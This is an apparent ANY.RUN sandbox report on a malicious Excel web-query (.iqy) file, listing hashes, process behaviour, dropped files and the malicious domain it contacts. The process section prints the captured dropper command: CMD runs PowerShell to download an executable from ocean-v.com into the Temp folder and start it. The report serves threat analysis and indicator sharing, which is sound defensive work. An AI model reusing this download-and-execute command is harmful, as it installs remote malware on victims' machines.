analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

4667527.iqy

Full analysis: https://app.any.run/tasks/365e72f1-f9c6-4162-8167-8b83df9d057f
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: November 17, 2019, 03:27:49
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5:

8DF3BF295BF6002BDA1CEAD3D527403D

SHA1:

D0766B399E9002A28F4C1A3F4385BA2DB40D6CBE

SHA256:

8C985FD851F06D726709024EACD51B67EA268C5FEE822CFA1460F581E7E38636

SSDEEP:

3:8BDzKRGAi3OlAQS7Rn:+DmgAi3OlAxRn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • CMD.EXE (PID: 3508)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • EXCEL.EXE (PID: 2336)
    • Creates files in the user directory

      • powershell.exe (PID: 3956)
  • INFO

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 2336)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
3
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start excel.exe cmd.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2336"C:\PROGRA~1\MICROS~1\Office14\EXCEL.EXE" /ddeC:\PROGRA~1\MICROS~1\Office14\EXCEL.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
3508CMD.EXE /c powershell Invoke-WebRequest "http://ocean-v.com/wp-content/1.exe" -OutFile "$env:Temp\1.exe";Start-Process "$env:Temp\1.exe"C:\Windows\system32\CMD.EXEEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3956powershell Invoke-WebRequest "http://ocean-v.com/wp-content/1.exe" -OutFile "$env:Temp\1.exe";Start-Process "$env:Temp\1.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCMD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
865
Read events
742
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
26
Text files
1
Unknown types
0

Dropped files

PID
Process
Filename
Type
2336EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRA92B.tmp.cvr
MD5:
SHA256:
2336EXCEL.EXEC:\Users\admin\AppData\Local\Temp\{045CBF10-D21C-4BD7-8AE3-AB82A698ED45}
MD5:
SHA256:
2336EXCEL.EXEC:\Users\admin\AppData\Local\Temp\{875D594C-E527-4469-AED6-DB6DB022C0B7}
MD5:
SHA256:
3956powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5EWUI0DGN5XG2JQ6WY7X.temp
MD5:
SHA256:
2336EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSDbinary
MD5:2BF6810877E99B3E3E032889CFA7E74A
SHA256:519F8DB8720CF84A99CC46AD8D2B6E70621B29C822B2C1BFAF8E1E7C9790B05F
2336EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSFbinary
MD5:689917A784B2062478AC7D660FDBC05D
SHA256:150B40D6AD21C85B55429832B2C84C09252A96CDB87858EE0BC363C08BF7F540
2336EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{7762729E-F9A3-4F56-A881-91E2ABD7BDCB}.FSDbinary
MD5:F0DD824429750E8019B29D4D6BA7C5F0
SHA256:39EB579DD174D423BBD90394741AD6FD2DCF22392160B66963CDF70ADB444E95
2336EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSDbinary
MD5:3D3B78E23952B7AB943F5E7951161B7D
SHA256:BCC9C76C451A70837F1B1C39E9913E136803CFFE56C697AE932B93566020FDF0
2336EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSFbinary
MD5:68F4AFD68A1B0732E8D4CF4E7719BB50
SHA256:C520BC7A7BBD42FA8E982D033AC94AE7EE660468D601701AA86CDE548B471292
2336EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{A7A1830A-2DB2-497E-999D-B7B392BEE6B4}.FSDbinary
MD5:13A07FF31225BA53E8A3B19248C3B62F
SHA256:32C814CF87BEA9625EE5DAC2D53DF304711490C8E81CEBBEA80EB38902DBA8B6
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2336
EXCEL.EXE
OPTIONS
200
120.136.14.25:80
http://ocean-v.com/wp-content/
JP
malicious
2336
EXCEL.EXE
GET
200
120.136.14.25:80
http://ocean-v.com/wp-content/1.txt
JP
text
139 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2336
EXCEL.EXE
120.136.14.25:80
ocean-v.com
SAKURA Internet Inc.
JP
malicious

DNS requests

Domain
IP
Reputation
ocean-v.com
  • 120.136.14.25
malicious

Threats

Found threats are available for the paid subscriptions
1 ETPRO signatures available at the full report
No debug info